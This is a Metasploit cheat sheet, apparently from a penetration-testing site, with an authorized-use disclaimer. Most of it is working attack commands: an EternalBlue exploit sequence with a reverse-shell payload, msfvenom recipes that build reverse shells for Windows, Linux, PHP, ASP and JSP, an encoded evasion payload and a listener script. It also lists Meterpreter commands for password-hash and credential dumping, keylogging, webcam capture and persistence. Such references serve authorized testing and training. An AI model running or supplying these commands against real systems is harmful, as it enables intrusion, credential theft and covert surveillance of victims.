โ† All cheat sheets

METASPLOIT

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

STARTING METASPLOIT#

msfconsole                       # Start Metasploit console
msfconsole -q                    # Quiet mode (no banner)
msfconsole -r script.rc          # Run resource script

DATABASE SETUP#

systemctl start postgresql       # Start PostgreSQL
msfdb init                       # Initialize database
msfdb reinit                     # Reinitialize database
db_status                        # Check database connection

BASIC COMMANDS#

help                             # Show help
search <term>                    # Search modules
use <module>                     # Select module
info                             # Show module info
show options                     # Show module options
show advanced                    # Show advanced options
set <option> <value>             # Set option value
setg <option> <value>            # Set global option
unset <option>                   # Unset option
run / exploit                    # Execute module
back                             # Exit current module
exit / quit                      # Exit Metasploit

SEARCH COMMANDS#

search type:exploit platform:windows     # Filter by type and platform
search cve:2021                          # Search by CVE year
search name:smb                          # Search by name
search author:hdm                        # Search by author
search rank:excellent                    # Search by rank

WORKSPACE MANAGEMENT#

workspace                        # List workspaces
workspace -a <name>              # Add workspace
workspace -d <name>              # Delete workspace
workspace <name>                 # Switch workspace

HOST & SERVICE MANAGEMENT#

hosts                            # List hosts
hosts -a <ip>                    # Add host
hosts -d <ip>                    # Delete host
services                         # List services
services -p 80                   # Filter by port
vulns                            # List vulnerabilities
creds                            # List credentials
loot                             # List loot

EXPLOITATION#

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
exploit

COMMON PAYLOADS#

# Windows
windows/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_tcp
windows/shell/reverse_tcp
windows/shell_reverse_tcp

# Linux
linux/x86/meterpreter/reverse_tcp
linux/x64/shell_reverse_tcp

# Web
php/meterpreter/reverse_tcp
java/meterpreter/reverse_tcp

METERPRETER COMMANDS#

# System
sysinfo                          # System information
getuid                           # Current user
getpid                           # Current process ID
ps                               # List processes
migrate <pid>                    # Migrate to process
kill <pid>                       # Kill process
execute -f cmd.exe               # Execute command
shell                            # Drop to shell
background                       # Background session

# File System
pwd                              # Print working directory
ls                               # List files
cd <dir>                         # Change directory
cat <file>                       # Read file
download <file>                  # Download file
upload <file>                    # Upload file
edit <file>                      # Edit file
rm <file>                        # Remove file
mkdir <dir>                      # Create directory
rmdir <dir>                      # Remove directory
search -f <pattern>              # Search for files

# Network
ipconfig / ifconfig              # Network interfaces
route                            # Routing table
portfwd add -l 8080 -p 80 -r <ip>  # Port forward
arp                              # ARP table

# Privilege Escalation
getsystem                        # Attempt SYSTEM privileges
hashdump                         # Dump password hashes
load kiwi                        # Load Mimikatz extension
creds_all                        # Dump all credentials

# Persistence
run persistence -h               # Persistence options
run persistence -U -i 5 -p 4444 -r <ip>

# Keylogging
keyscan_start                    # Start keylogger
keyscan_dump                     # Dump captured keys
keyscan_stop                     # Stop keylogger

# Screenshot & Camera
screenshot                       # Take screenshot
webcam_list                      # List webcams
webcam_snap                      # Take webcam photo

SESSION MANAGEMENT#

sessions                         # List sessions
sessions -i <id>                 # Interact with session
sessions -k <id>                 # Kill session
sessions -K                      # Kill all sessions
sessions -u <id>                 # Upgrade to meterpreter

AUXILIARY MODULES#

# Scanning
auxiliary/scanner/portscan/tcp
auxiliary/scanner/smb/smb_version
auxiliary/scanner/ssh/ssh_version
auxiliary/scanner/http/http_version

# Enumeration
auxiliary/scanner/smb/smb_enumshares
auxiliary/scanner/smb/smb_enumusers
auxiliary/scanner/snmp/snmp_enum

# Brute Force
auxiliary/scanner/ssh/ssh_login
auxiliary/scanner/ftp/ftp_login
auxiliary/scanner/smb/smb_login

POST EXPLOITATION#

# Windows
post/windows/gather/hashdump
post/windows/gather/enum_logged_on_users
post/windows/gather/enum_applications
post/windows/manage/migrate

# Linux
post/linux/gather/hashdump
post/linux/gather/enum_users_history
post/linux/gather/enum_network

# Multi-platform
post/multi/gather/env
post/multi/gather/ssh_creds

MSFVENOM PAYLOADS#

# Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f exe > shell.exe

# Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f elf > shell.elf

# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f raw > shell.php

# ASP reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f asp > shell.asp

# JSP reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=4444 -f raw > shell.jsp

# Python reverse shell
msfvenom -p cmd/unix/reverse_python LHOST=<ip> LPORT=4444 -f raw

# Encoded payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe > encoded.exe

RESOURCE SCRIPTS#

# Create script: handler.rc
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false
exploit -j

# Run script
msfconsole -r handler.rc